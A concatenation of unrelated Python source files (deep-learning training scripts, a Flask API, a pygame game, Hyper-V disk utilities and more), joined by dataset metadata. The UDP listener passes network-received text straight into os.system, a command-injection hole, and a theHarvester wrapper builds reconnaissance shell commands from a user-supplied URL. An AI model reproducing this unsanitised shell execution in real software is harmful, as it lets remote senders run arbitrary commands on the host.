2742229056@qq.com\n# Software: PyCharm\n# File: finetune_triplet.py\n# Time: 8/1/19 10:03 PM\n# 
Description: finetune the tiger_cnn3 with triplet\n# -------------------------------------------------------------------------------\n\nimport torch.optim as optim\nfrom shutil import copyfile\nfrom datetime import datetime\nfrom tqdm import tqdm\nfrom core import *\nfrom dataload import *\n\ninit_environment()\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\nmulti_gpus = False\nmodel_name = 'tiger_cnn8'\n\n\ndef main():\n save_dir = os.path.join(SAVE_DIR, model_name + '_' +\n datetime.now().strftime('%Y%m%d_%H%M%S'))\n if os.path.exists(save_dir):\n raise NameError('model dir exists!')\n os.makedirs(save_dir)\n copyfile('./finetune_tiger_cnn8.py', save_dir + '/train.py')\n copyfile('./core/model.py', save_dir + '/model.py')\n copyfile('./core/config.py', save_dir + '/config.py')\n logging = init_log(save_dir)\n _print = logging.info\n\n train_paths = ['./datalist/train.txt', ]\n gallery_paths = ['./datalist/gallery.txt', ]\n probe_paths = ['./datalist/probe.txt', ]\n\n train_iter, gallery_iter, probe_iter = load_triplet_direction_gallery_probe(\n root='./database',\n train_paths=train_paths,\n gallery_paths=gallery_paths,\n probe_paths=probe_paths,\n signal=' ',\n resize_size=RESIZE_SIZE,\n input_size=INPUT_SIZE,\n batch_size=4,\n num_workers=2,\n collate_fn=train_collate\n )\n\n feature_size = 1024\n\n net = tiger_cnn8(classes=107)\n ignore_params = list(map(id, net.fc7.parameters()))\n ignore_params += list(map(id, net.cls.parameters()))\n ignore_params += list(map(id, net.cls_direction.parameters()))\n ignore_params += list(map(id, net.erase_fc7.parameters()))\n ignore_params += list(map(id, net.erase_cls.parameters()))\n ignore_params += list(map(id, net.erase_cls_direction.parameters()))\n ignore_params += list(map(id, net.fuse_fc7.parameters()))\n ignore_params += list(map(id, net.fuse_cls.parameters()))\n ignore_params += list(map(id, net.fuse_cls_direction.parameters()))\n base_params = filter(lambda p: id(p) not in ignore_params, net.parameters())\n extra_params = filter(lambda p: id(p) in ignore_params, net.parameters())\n optimizer = optim.SGD(\n [{'params': base_params, 'lr': 0.001},\n {'params': extra_params, 'lr': 0.001}],\n weight_decay=1e-4, momentum=0.9, nesterov=True\n )\n exp_lr_scheduler = StepLRScheduler(optimizer=optimizer, decay_t=20, decay_rate=0.1, warmup_lr_init=1e-5, warmup_t=3)\n\n net.load_state_dict(torch.load('./model/tiger_cnn3/model.ckpt')['net_state_dict'])\n # net.fix_params(is_training=False)\n net = net.cuda()\n if multi_gpus:\n net = nn.DataParallel(net)\n\n losses = AverageMeter()\n train_acc = AverageMeter()\n train_acc5 = AverageMeter()\n\n erase_train_acc = AverageMeter()\n\n max_test_acc = 0.0\n for epoch in range(TOTAL_EPOCH):\n\n # train\n net.train()\n flag = False\n exp_lr_scheduler.step(epoch)\n losses.reset()\n train_acc.reset()\n train_acc5.reset()\n erase_train_acc.reset()\n\n for data in tqdm(train_iter, desc='Train Epoch: {}'.format(epoch + 1)):\n inputs, labels, direction = data\n\n if random.uniform(0, 1) > 0.5:\n inputs = fliplr(inputs)\n direction = 1 - direction\n\n if inputs.size(0) == 1:\n continue\n inputs = inputs.cuda()\n labels = labels.long().cuda()\n direction = direction.long().cuda()\n b_size = labels.size(0)\n\n optimizer.zero_grad()\n\n logits = net(inputs, labels)\n if multi_gpus:\n loss = net.module.get_loss(logits, labels, direction)\n else:\n loss = net.get_loss(logits, labels, direction)\n\n if loss == 0:\n continue\n\n acc = accuracy(logits[0].data, labels, topk=(1, 5))\n losses.update(loss.item(), b_size)\n 
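# Keep running epoch averages: the loss meter plus top-1 and top-5 accuracy.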
train_acc.update(acc[0], b_size)\n train_acc5.update(acc[1], b_size)\n\n loss.backward()\n optimizer.step()\n _print('Train Epoch: {}\\t'\n 'Loss: {loss.avg:.4f}\\t'\n 'TrainAcc: Prec@1 {train_acc.avg:.3f}%\\tPrec@2 {erase_train_acc.avg:.3f}%'.format(\n epoch + 1, loss=losses, train_acc=train_acc, erase_train_acc=train_acc5\n ))\n\n # val\n if (epoch + 1) % TEST_FREQ == 0:\n net.eval()\n gallery_features = []\n gallery_labels = []\n query_features = []\n query_labels = []\n for data in tqdm(gallery_iter, desc='Train Epoch: {}'.format(epoch + 1)):\n with torch.no_grad():\n inputs, labels = data\n if inputs.size(0) == 1:\n continue\n labels = labels.long().cuda()\n b_size = labels.size(0)\n\n ff = torch.FloatTensor(b_size, feature_size).zero_().cuda()\n for i in range(1):\n flip_inputs = fliplr(inputs).detach()\n flip_inputs = Variable(flip_inputs.cuda())\n\n input_img = Variable(inputs.cuda())\n if multi_gpus:\n features = net.module.features(input_img)[0]\n flip_features = net.module.features(flip_inputs)[0]\n else:\n features = net.features(input_img)[0]\n flip_features = net.features(flip_inputs)[0]\n\n ff += torch.cat((features, flip_features), dim=1)\n\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)\n ff = ff.div(fnorm.expand_as(ff))\n\n for i in range(b_size):\n gallery_features.append(ff[i].cpu().numpy())\n gallery_labels.append(labels[i].cpu().numpy())\n\n for data in tqdm(probe_iter, desc='Train Epoch: {}'.format(epoch + 1)):\n with torch.no_grad():\n inputs, labels = data\n if inputs.size(0) == 1:\n continue\n labels = labels.long().cuda()\n b_size = labels.size(0)\n\n ff = torch.FloatTensor(b_size, feature_size).zero_().cuda()\n for i in range(1):\n flip_inputs = fliplr(inputs).detach()\n flip_inputs = Variable(flip_inputs.cuda())\n\n input_img = Variable(inputs.cuda())\n if multi_gpus:\n features = net.module.features(input_img)[0]\n flip_features = net.module.features(flip_inputs)[0]\n else:\n features = net.features(input_img)[0]\n flip_features = net.features(flip_inputs)[0]\n\n ff += torch.cat((features, flip_features), dim=1)\n\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)\n ff = ff.div(fnorm.expand_as(ff))\n\n for i in range(b_size):\n query_features.append(ff[i].cpu().numpy())\n query_labels.append(labels[i].cpu().numpy())\n gallery_features = torch.FloatTensor(gallery_features)\n gallery_labels = np.array(gallery_labels)\n query_features = torch.FloatTensor(query_features)\n query_labels = np.array(query_labels)\n\n CMC, ap = evaluate_rerank_CMC(query_features, query_labels, gallery_features, gallery_labels)\n _print('Rank@1:%f Rank@5:%f Rank@10:%f mAP:%f' % (CMC[0], CMC[4], CMC[9], ap / len(query_labels)))\n if max_test_acc <= CMC[0]:\n max_test_acc = CMC[0]\n flag = True\n # save\n if flag:\n msg = 'Saving checkpoint: {}'.format(epoch + 1)\n _print(msg)\n if multi_gpus:\n net_state_dict = net.module.state_dict()\n else:\n net_state_dict = net.state_dict()\n if not os.path.exists(save_dir):\n os.mkdir(save_dir)\n torch.save(\n {'epoch': epoch,\n 'net_state_dict': net_state_dict},\n os.path.join(save_dir, 'model.ckpt')\n )\n _print('-------max_test_acc Rank@1 {max_test_acc:.3f}-------'.format(\n max_test_acc=max_test_acc\n ))\n\n _print('finish')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"finetune_tiger_cnn8.py","file_name":"finetune_tiger_cnn8.py","file_ext":"py","file_size_in_byte":8868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"223348520","text":"from sklearn.preprocessing import 
OneHotEncoder\nimport pandas as pd\n\ndef onehot(dataframes, col, **kwargs):\n \"\"\"Applies onehot transformation to the col\n It trains the classifier using the first dataframe\n \n Args:\n dataframes (List[DataFrame[float]]): list of pandas dataframes\n cols (str): The col that should be transformed\n \"\"\"\n\n onehot_clf = OneHotEncoder(sparse=False)\n onehot_clf.fit(dataframes[0][col].values.reshape(-1,1))\n\n\n for i in range(len(dataframes)):\n col_onehot = onehot_clf.transform(\n dataframes[i][col].values.reshape(-1,1))\n \n n_onehot_cols = col_onehot.shape[1]\n onehot_col_names = [\"{}_{}\".format(col, i) for i in range(n_onehot_cols)]\n\n transformed_df = pd.DataFrame(col_onehot, columns=onehot_col_names)\n \n for onehot_col in onehot_col_names:\n kwargs = {onehot_col:transformed_df[onehot_col].values}\n dataframes[i] = dataframes[i].assign(**kwargs)\n \n dataframes[i] = dataframes[i].drop([col], axis=1)\n \n return dataframes\n\n\n","sub_path":"src/pipelines/filters/onehot.py","file_name":"onehot.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"431919055","text":"# Copyright 2014 Cloudbase Solutions Srl\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nUtility class for VHD related operations.\nBased on the \"root/virtualization/v2\" namespace available starting with\nHyper-V Server / Windows Server 2012.\n\"\"\"\nimport os\n\nif os.name == 'nt':\n import wmi\n\nfrom cinder.openstack.common import log as logging\nfrom cinder.volume.drivers.windows import constants\nfrom cinder.volume.drivers.windows import vhdutils\nfrom cinder.volume.drivers.windows import windows_utils\n\nLOG = logging.getLogger(__name__)\n\n\nclass VHDUtilsV2(vhdutils.VHDUtils):\n\n _vhd_format_map = {\n 'vhd': 2,\n 'vhdx': 3,\n }\n\n def __init__(self):\n self.utils = windows_utils.WindowsUtils()\n self._conn = wmi.WMI(moniker='//./root/virtualization/v2')\n\n def _get_resize_method(self):\n image_man_svc = self._conn.Msvm_ImageManagementService()[0]\n return image_man_svc.ResizeVirtualHardDisk\n\n def convert_vhd(self, src, dest, vhd_type=constants.VHD_TYPE_DYNAMIC):\n vhd_info = self._conn.Msvm_VirtualHardDiskSettingData.new()\n ext = os.path.splitext(dest)[1][1:]\n format = self._vhd_format_map.get(ext)\n\n vhd_info.Type = vhd_type\n vhd_info.Path = dest\n vhd_info.Format = format\n vhd_info.BlockSize = 0\n vhd_info.LogicalSectorSize = 0\n vhd_info.ParentPath = None\n\n image_man_svc = self._conn.Msvm_ImageManagementService()[0]\n (job_path, ret_val) = image_man_svc.ConvertVirtualHardDisk(\n SourcePath=src, VirtualDiskSettingData=vhd_info.GetText_(1))\n self.utils.check_ret_val(ret_val, job_path)\n","sub_path":"cinder/virtualenv/lib/python2.6/site-packages/cinder/volume/drivers/windows/vhdutilsv2.py","file_name":"vhdutilsv2.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
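# A minimal, hypothetical usage sketch for the onehot filter defined in
# onehot.py above; the frames and the column name "cat" are illustrative
# assumptions, and onehot() is assumed to be in scope. The encoder is fitted
# on the first frame only and then applied to every frame, so all frames end
# up with the same indicator columns.
import pandas as pd

train_df = pd.DataFrame({"cat": [0, 1, 0, 2], "y": [1, 0, 1, 1]})
test_df = pd.DataFrame({"cat": [2, 0, 1, 1], "y": [0, 1, 0, 0]})

train_df, test_df = onehot([train_df, test_df], "cat")
print(train_df.columns.tolist())  # ['y', 'cat_0', 'cat_1', 'cat_2']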
+{"seq_id":"598627203","text":"\"\"\"\n~~~~~~~~~~~~~~~~~\nweb.products.api.py\n\nPark all products apis here\n~~~~~~~~~~~~~~~~~\n\"\"\"\n\nimport logging\n\n\nfrom flask import jsonify, request, Response\nfrom dao.product_service import ProductService\nfrom web.products.utils import parse_products_response\nfrom web.common.exceptions import BadRequest\nfrom web.products import products\n\nlogger = logging.getLogger(\"products.api\")\n\nproduct_service = ProductService()\n\n\n@products.route(\"/products/categories\", methods=[\"GET\"])\ndef get_categories():\n \"\"\"Get categories\"\"\"\n categories = product_service.list_categories()\n if not categories:\n return Response(status=204)\n\n return jsonify({\"categories\": categories}), 200\n\n\n@products.route(\"/products\", methods=[\"GET\"])\ndef search_products():\n \"\"\"Search products\"\"\"\n\n category = request.args.get(\"category\")\n if not category:\n raise BadRequest(\"Product category is required in args\")\n text = request.args.get(\"text\")\n if not text:\n raise BadRequest(\"Product text is required in args\")\n\n page_num = int(request.args.get(\"page\", \"1\"))\n response = parse_products_response(\n category=category, text=text, page_num=page_num, product_service=product_service\n )\n if not response:\n raise Response(status=204)\n\n return jsonify(response), 200\n","sub_path":"web/products/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"379939493","text":"from mrjob.job import MRJob\nfrom mrjob.protocol import JSONProtocol, RawValueProtocol\nimport datetime\nimport logging\n\n\ndef safeFloat(stuff):\n try:\n f = float(stuff)\n except ValueError:\n pass\n else:\n if f != 0:\n return f\n\n\ndef sanitize(stuff):\n if stuff.lower() != 'nan':\n return stuff\n\n\nclass MRbuildRoutes(MRJob):\n INPUT_PROTOCOL = RawValueProtocol\n OUTPUT_PROTOCOL = JSONProtocol\n\n def mapper(self, _, line):\n if not line.startswith('idO'):\n record = line.split(',')\n tupledict = {'idOwnApp':record[0],\n 'idMsg':record[1],\n 'idVeh':record[2],\n 'idProviderComm':record[3],\n 'tmMsg':record[4],\n 'amLat':safeFloat(record[5]),\n 'amLong':safeFloat(record[6]),\n 'amSpeedCurr':safeFloat(record[7]),\n 'idSts':bool(record[8]),\n 'idTrigger':record[9],\n 'amDistTot':safeFloat(record[10]),\n 'amEngMinsTot':safeFloat(record[11]),\n 'tmUpdate':record[12],\n 'idMsgBlobParent':record[13],\n 'idMsgVp':sanitize(record[14]),\n 'place_name':record[15],\n 'postal_code':record[16],\n 'country_code':record[17]\n }\n\n yield tupledict['idVeh'], tupledict\n\n def reducer(self, idVeh, data):\n points = sorted(data, key=lambda record: record['tmMsg'])\n yield idVeh, points\n\n\nif __name__ == '__main__':\n MRbuildRoutes.run()\n","sub_path":"TRUCK_wisdom/codes/routes/roadmrjob1.py","file_name":"roadmrjob1.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"385921664","text":"import re\nimport itertools\nimport warnings\n\ndef link_in_response_header(response):\n \"\"\"\n A server implementing content negotiation by profile SHOULD return an HTTP Link header\n containing information about the default and any alternate representations of that\n resource including profiles they conform to.\n \"\"\"\n assert 'link' in response.headers\n\n \"\"\"\n The default representation – the one that will be returned when no specific representation\n is requested – 
SHOULD be identified by rel=\"canonical\", other representations by rel=\"alternate\"\n \"\"\"\n links = response.headers['link'].split(',')\n supported_profiles = [p.strip() for p in links if 'profile=' in p ]\n\n assert len([p for p in supported_profiles if 'rel=\"canonical\"' in p]) == 1, \\\n 'R.1.1.b: Profile with rel=\"canonical\" was not found'\n \n assert all(['rel=\"alternate\"' in p for p in supported_profiles if 'rel=\"canonical\"' not in p]), \\\n 'R.1.1.b: All alternative profiles were not identified with rel=\"alternate\"'\n\ndef link_indicates_profile_returned(response, requested_profile):\n \"\"\"\n A server implementing content negotiation by profile MUST respond with an\n HTTP Response header containing a Link header with rel=\"profile\" indicating the profile returned.\n \"\"\"\n links = response.headers['link'].split(',')\n\n profile_link_header = [p for p in links if 'rel=\"profile\"' in p ]\n assert len(profile_link_header) == 1\n assert f\"<{requested_profile}>\" in profile_link_header[0]\n\ndef check_existance_of_alternatives(response, profiles, mediatypes):\n \"\"\"\n R.2.3.c\n The server SHOULD represent the alternate profiles information in the HTTP header\n of the response, as per the HTTP Headers functional profile (using a Link header)\n \"\"\"\n assert 'link' in response.headers\n\n links = response.headers['link'].split(',')\n supported_profiles = [p.strip() for p in links if 'profile=' in p ]\n\n '''\n R.2.3.c\n The server SHOULD represent the alternate profiles information in the HTTP header\n of the response, as per the HTTP Headers functional profile (using a Link header)\n '''\n assert all(['rel=\"alternate\"' in p for p in supported_profiles if 'rel=\"self\"' not in p])\n urls = [re.search('<(http.*)>', profile).group(1) for profile in supported_profiles]\n\n # Check that profile/mediatype combinations that are passed to the function\n # i.e: which should exist, are present in the Link Header\n qsa_urls_should_be_present = []\n for p, e in itertools.product(profiles, mediatypes):\n alternative_found = False\n for full_link in supported_profiles:\n if f'profile=\"{p}\"' in full_link and f'type=\"{e}\"' in full_link:\n qsa_urls_should_be_present.append(re.search(\"<(http.*)>\", full_link).group(1))\n alternative_found = True\n break\n\n assert alternative_found, \\\n f'Could not find an alternate with profile=\"{p}\" and type=\"{e}\"'\n\n assert len(set(qsa_urls_should_be_present) - set(urls)) == 0\n\n '''\n R.2.3.d\n [the server] MAY also represent the information in the response body\n in place of the default profile representation of a resource\n \n R.2.3.e\n Where a server does provide alternate profiles information in an HTTP body,\n the server MAY allow clients to negotiate for particular Media Types of the\n response by using the same Media Type negotiation method used for the get resource\n by profile function\n '''\n qsa_urls_in_body = set(\n re.findall(r\"href=\\\"(\\S+_profile=\\w+&_mediatype=.*?)\\\"\", str(response.content))\n )\n\n if qsa_urls_in_body:\n assert len(urls) == len(qsa_urls_in_body)\n\n if any([url for url in urls if url not in qsa_urls_in_body]):\n warnings.warn(\"Alternative profile URLs found in default page do not match Link Header!\")\n \n\n # Since assumptions cannot be made on how the data will be presented (table, CSS grid etc.)\n # unable to verify the required information is present, apart from the URLs\n '''\n R.2.4.a - UNTESTED\n Implementations of this specification according to the QSA Functional Profiles\n MUST 
communicate their alternate representations information as per the\n Alternate Representations Data Model\n \n R.2.4.b - UNTESTED\n They MAY do so using HTTP Link headers, as per the HTTP Headers functional profile,\n or they MAY use other approaches.\n \n R.2.4.c - UNTESTED\n They may do so via HTTP body content, perhaps in HTML or other data models/formats\n '''\n\n","sub_path":"validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"138956630","text":"\"\"\"\nThe following snippet shows how you can write a simple calculator without the need to use if-else conditions.\n\"\"\"\n\nimport operator\n\naction = {\n \"+\": operator.add,\n \"-\": operator.sub,\n \"/\": operator.truediv,\n \"*\": operator.mul,\n \"**\": pow\n}\nprint(action['-'](50, 25)) # 25\n","sub_path":"Calculator Without If-Else.py","file_name":"Calculator Without If-Else.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"404573719","text":"## Game class\nimport CONSTANTS\nimport pygame\nimport random\nimport block_library\nimport good_block_library\nimport bad_block_library\nimport score_library\nimport player_library\n\nclass Game(object):\n ''' This class represents an instance of the game\n To restart/reset the game we just need to create\n a new instance of the class '''\n\n def __init__(self):\n ''' constructor '''\n self.game_over = False\n\n # create sprite lists\n self.good_block_list = pygame.sprite.Group()\n self.bad_block_list = pygame.sprite.Group()\n self.all_sprites_list = pygame.sprite.Group()\n\n # set sprite varianles\n self.good_block_sprite = CONSTANTS.GOOD_BLOCK_GRAPHIC\n self.bad_block_sprite = CONSTANTS.BAD_BLOCK_GRAPHIC\n\n # create good blocks\n for i in range(random.randrange(30, 80)):\n block = good_block_library.Good_Block( self.good_block_sprite )\n\n # Set random location for block\n block.rect.x = random.randrange(CONSTANTS.SCREEN_WIDTH)\n block.rect.y = random.randrange(CONSTANTS.SCREEN_HEIGHT)\n\n # add block to the appropriate lists\n self.good_block_list.add(block)\n self.all_sprites_list.add(block)\n\n # create bad blocks\n for i in range(random.randrange(60, 100)):\n block = bad_block_library.Bad_Block ( self.bad_block_sprite )\n\n # set random locations for the blocks\n block.rect.x = random.randrange(CONSTANTS.SCREEN_WIDTH)\n block.rect.y = random.randrange(CONSTANTS.SCREEN_HEIGHT)\n\n # add block to the appropriate lists\n self.bad_block_list.add(block)\n self.all_sprites_list.add(block)\n\n\n # create the player\n self.player = player_library.Player(20, 15, CONSTANTS.PLAYER_BOUNCE_SOUND)\n self.player.makesoundmixer()\n self.all_sprites_list.add(self.player)\n\n # create the score attribute:\n # set score attributes\n self.score = score_library.Score()\n self.score.text = 0\n self.score.font = 'Calibri'\n self.score.size = 30\n self.score.bold = True\n self.score.italics = True\n\n\n\n def process_events(self): # process user input, return a true if game is over\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n return True\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.game_over:\n self.__init__()\n\n\n # Set the speed based on the key pressed\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.player.changespeed(-3, 0)\n elif event.key == pygame.K_RIGHT:\n self.player.changespeed(3, 0)\n elif event.key == 
pygame.K_UP:\n self.player.changespeed(0, -3)\n elif event.key == pygame.K_DOWN:\n self.player.changespeed(0, 3)\n \n # Reset speed when key goes up\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n self.player.changespeed(3, 0)\n elif event.key == pygame.K_RIGHT:\n self.player.changespeed(-3, 0)\n elif event.key == pygame.K_UP:\n self.player.changespeed(0, 3)\n elif event.key == pygame.K_DOWN:\n self.player.changespeed(0, -3)\n\n\n def run_logic(self): # this method is run for each frame\n if not self.game_over:\n\n self.all_sprites_list.update()\n self.score.create_text()\n\n # check for collisions\n self.good_blocks_hit_list = pygame.sprite.spritecollide(self.player, self.good_block_list, True)\n self.bad_blocks_hit_list = pygame.sprite.spritecollide(self.player, self.bad_block_list, True)\n\n # process collisions\n for block in self.good_blocks_hit_list:\n self.score.text += 1\n CONSTANTS.GOOD_BLOCK_SOUND.play()\n\n for block in self.bad_blocks_hit_list:\n self.player.lifes -= 1\n CONSTANTS.BAD_BLOCK_SOUND.play()\n\n\n # check to see if the game is over\n if len(self.good_block_list) == 0 or self.player.lifes <= 0:\n self.game_over = True\n\n\n def display_frame(self, screen): # Display stuff to the screen\n screen.fill(CONSTANTS.WHITE)\n\n if self.game_over:\n font = pygame.font.SysFont(\"serif\", 25)\n text = font.render(\"Game Over! Click to restart.\", True, CONSTANTS.BLACK)\n centre_x = (CONSTANTS.SCREEN_WIDTH // 2) - (text.get_width() // 2)\n centre_y = (CONSTANTS.SCREEN_HEIGHT // 2) - (text.get_height() // 2)\n screen.blit(text, [centre_x, centre_y])\n\n score_text1 = font.render(str(self.score.text), True, CONSTANTS.BLACK)\n score_text = font.render(\"Your score was: \", True, CONSTANTS.BLACK)\n score_centre_y = centre_y + (score_text.get_height())\n screen.blit(score_text, [centre_x, score_centre_y])\n screen.blit(score_text1, [(centre_x + score_text.get_width() + 5), score_centre_y])\n\n \n if not self.game_over:\n self.score.draw_text(screen, CONSTANTS.SCREEN_WIDTH - self.score.size , 10)\n self.all_sprites_list.draw(screen)\n self.player.draw_lives(screen)\n\n pygame.display.flip()\n \n \n \n \n \ndef main():\n ''' Main program function'''\n pygame.init()\n size = [CONSTANTS.SCREEN_WIDTH, CONSTANTS.SCREEN_HEIGHT]\n screen = pygame.display.set_mode(size)\n\n pygame.display.set_caption(\"Blue Block Redemption\")\n pygame.mouse.set_visible(False)\n\n # create objects and set data for the function\n done = False\n clock = pygame.time.Clock()\n\n # create an instance of the game class\n game = Game()\n\n # main game loop\n while not done:\n # process events\n done = game.process_events()\n\n # update object positions, check for collisions\n game.run_logic()\n\n # draw the current frame\n game.display_frame(screen)\n\n # Pause for next frame\n clock.tick(60)\n\n # close window and exit\n pygame.quit()\n\n\n# Call main function, start up game\n\nif __name__ == \"__main__\":\n main()\n \n\n\n\n","sub_path":"Collect_Blocks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"573039014","text":"#!/bin/python\r\n\r\nPORT = 50001\r\nMAGIC = \"fna349fn\" #to make sure we don't confuse or get confused by other programs\r\n\r\nfrom socket import socket, AF_INET, SOCK_DGRAM\r\nimport os\r\n\r\ntry:\r\n \r\n s = socket(AF_INET, SOCK_DGRAM) #create UDP socket\r\n s.bind(('', PORT))\r\n\r\n while 1:\r\n data, addr = s.recvfrom(1024) #wait for a 
packet\r\n if data.startswith(bytes(MAGIC, 'UTF-8')):\r\n print(addr)\r\n state = data[len(MAGIC):].decode('UTF-8')\r\n print(\"got service announcement from %s: %s\" % (addr[0], state))\r\n os.system(\"python send.py %s\" % state)\r\n \r\n else:\r\n \tprint(\"HIDDEN::: %s\" % data.decode('UTF-8'))\r\n \t\r\nexcept KeyboardInterrupt:\r\n os.system(\"python send.py QUIT\")\r\n print(\"cancel.\")\r\n","sub_path":"listenToClients.py","file_name":"listenToClients.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"585791756","text":"#!/usr/bin/env python3\n\nclass theHarvester:\n def __init__(self, args):\n self.url = args.url\n self.power = args.power\n self.command = \"\"\n\n def Info(self):\n self.command = \"theharvester -h\"\n\n def Run(self):\n if self.url[:7] == \"http://\":\n self.url = self.url.replace(\"http://\", \"\")\n elif self.url[:8] == \"https://\":\n self.url = self.url.replace(\"https://\", \"\")\n if self.url[-1] == \"/\":\n self.url = self.url.rstrip('/')\n \n if self.power == 1:\n self.power = \"-l 500 -b google,bing\"\n elif self.power == 2:\n self.power = \"-l 800 -b google,bing,duckduckgo,yahoo --shodan\"\n elif self.power == 3:\n self.power = \"-l 1000 -b google,bing,duckduckgo,yahoo,dnsdumpster,rapiddns --shodan -v -r -n -c\"\n else:\n print(f\"\\n{C.YELLOW}[!]{C.RC} The selected power level is not supported by the script. Level 1 has been selected by default.{C.RC}\")\n self.power = \"-l 500 -b google,bing\"\n\n self.command = \"theharvester -d \" + self.url + \" \" + self.power\n return self.command","sub_path":"src/tools/theharvester.py","file_name":"theharvester.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"360116239","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\n# ____ ____ ______________\n# | | | | | |\n# | | | | |_____ _____|\n# | |__| | | |\n# | __ | | |\n# | | | | | |\n# | | | | | |\n# |____| |____| |____|\n#\n# fileName:train \n# project: TextCNN_SpamSort\n# author: theo_hui\n# e-mail:Theo_hui@163.com\n# purpose: Train the model\n# createDate:2019/5/8\n\n#! 
/usr/bin/env python\n# encoding: utf-8\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport data_process_tool\nimport word2vec_tool\nfrom TextCNN import TextCNN\n\n\n\n# Parameters for the training data\ntf.flags.DEFINE_float(\"validation_percentage\",0.1,\"Fraction of all training data used for validation\")\ntf.flags.DEFINE_string(\"positive_data_file\", \"./data/ham_100.utf8\", \"Positive sample data\")\ntf.flags.DEFINE_string(\"negative_data_file\", \"./data/spam_100.utf8\", \"Negative sample data\")\ntf.flags.DEFINE_integer(\"num_labels\",2,\"Number of classes (binary classification)\")\n\n# Model parameters\ntf.flags.DEFINE_integer(\"embedding_dim\", 128, \"Dimensionality of the embedding layer\")\ntf.flags.DEFINE_string(\"filter_sizes\", \"3,4,5\", \"Sizes of each filter\")\ntf.flags.DEFINE_integer(\"num_filters\", 128, \"Number of filters per filter size\")\ntf.flags.DEFINE_float(\"dropout_keep_prob\", 0.5, \"Dropout keep probability\")\ntf.flags.DEFINE_float(\"l2_reg_lambda\", 0.0, \"L2 regularization lambda\")\n\n# Training parameters\ntf.flags.DEFINE_integer(\"batch_size\", 64, \"Batch size\")\ntf.flags.DEFINE_integer(\"num_steps\", 200, \"Number of training iterations\")\ntf.flags.DEFINE_integer(\"evaluate_every\", 100, \"Evaluate the model after this many steps\")\ntf.flags.DEFINE_integer(\"checkpoint_every\", 100, \"Save the model after this many steps\")\ntf.flags.DEFINE_integer(\"num_checkpoints\", 5, \"Number of checkpoints to keep\")\n\n# Misc parameters\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n# Parse the flags\nFLAGS = tf.flags.FLAGS\nFLAGS.flag_values_dict()\nprint(\"\\n*FLAGS SET AS FOLLOWS*\\nFLAG_NAME\\tFLAG_VALUE\\n===========================================================\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}\\t{}\".format(attr.upper(), value))\nprint(\"==========================================================================\")\n\n# Output directories for data and models\n# =======================================================\ntimestamp = str(int(time.time()))\nout_dir = os.path.abspath(os.path.join(os.path.curdir, \"runs\",timestamp))\nwVec_dir = os.path.abspath(os.path.join(os.path.curdir,\"wordVec\"))\nprint(\"\\nword2vec model saved to {}\\nWriting to {}\\n\".format(wVec_dir,out_dir))\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\nif not os.path.exists(wVec_dir):\n os.makedirs(wVec_dir)\n# Data preparation\n# =======================================================\n\n# Load data\nprint(\"\\nLoading data...\")\nx_text, y = data_process_tool.load_positive_negative_data_files(FLAGS.positive_data_file, FLAGS.negative_data_file)\nprint(x_text)\nprint(\"\\nloaded!\")\n\n# Build the embedding-layer vectors\nprint(\"\\nLoading embedding layer tensors (padding)...\")\nsentences, max_document_length = data_process_tool.padding_sentences(x_text, '<PADDING>')\nprint(\"padding done!\")\nx = np.array(word2vec_tool.embedding_sentences(sentences, embedding_size = FLAGS.embedding_dim, file_to_save = os.path.join(wVec_dir, 'trained_word2vec.model')))\nprint(\"x.shape = {}\".format(x.shape))\nprint(\"y.shape = {}\".format(y.shape))\n\n\n\n# Save the training parameters\ntraining_params_file = os.path.join(out_dir, 'training_params.pickle')\nparams = {'num_labels' : FLAGS.num_labels, 'max_document_length' : max_document_length}\ndata_process_tool.saveDict(params, training_params_file)\n\n#\n# Randomly shuffle the data\nnp.random.seed(10)\nshuffle_indices = np.random.permutation(np.arange(len(y)))\nx_shuffled = x[shuffle_indices]\ny_shuffled = 